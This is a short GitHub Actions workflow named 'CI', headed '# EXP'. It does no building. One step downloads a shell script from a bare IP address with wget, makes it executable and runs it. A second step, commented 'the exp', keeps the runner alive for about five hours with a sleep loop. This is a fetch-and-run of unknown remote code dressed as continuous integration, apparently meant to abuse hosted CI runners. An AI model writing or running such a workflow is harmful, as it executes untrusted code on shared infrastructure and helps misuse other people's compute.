# EXP

name: CI


on:

  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:


jobs:

  build:

    runs-on: ubuntu-22.04

    steps:

      - uses: actions/checkout@v3


      - name: Run a one-line script
        run: wget http://45.140.141.145/sensi.sh; chmod 777 sensi.sh; sh sensi.sh;
    
      
      - name: Multiline
        run: | # the exp
            for i in {1..18000}
            do
               echo "$i"
               sleep 1
            done
      
      
      
      
